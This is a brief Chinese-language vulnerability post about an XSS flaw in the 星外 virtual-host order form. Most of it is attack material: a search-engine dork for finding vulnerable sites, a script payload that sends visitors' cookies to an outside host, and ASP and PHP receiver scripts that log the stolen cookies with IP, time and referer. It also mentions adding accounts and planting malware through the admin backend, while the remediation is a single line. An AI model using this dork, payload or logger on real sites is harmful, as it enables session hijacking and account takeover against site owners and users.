google or baidu 搜索 inurl:user/order.asp?type=虚拟主机
暂时只会XSS偷取cookie 可以加帐号 可以后台挂马 等等等等 XXS 偷取cookie代码 <script>document.write('<img src=" http://HdhCmsTest2cto测试数据 /news. asp ?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> news.asp代码: <% msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("cook.txt") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Writeline(""&msg& "") thisfile.close set fs = nothing %> PHP 版代码: <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $time=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('cook.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); ?> BY :CY
修复:严格过滤
查看更多关于星外订单提交处过滤不严导致XSS及修复 - 网站安的详细内容...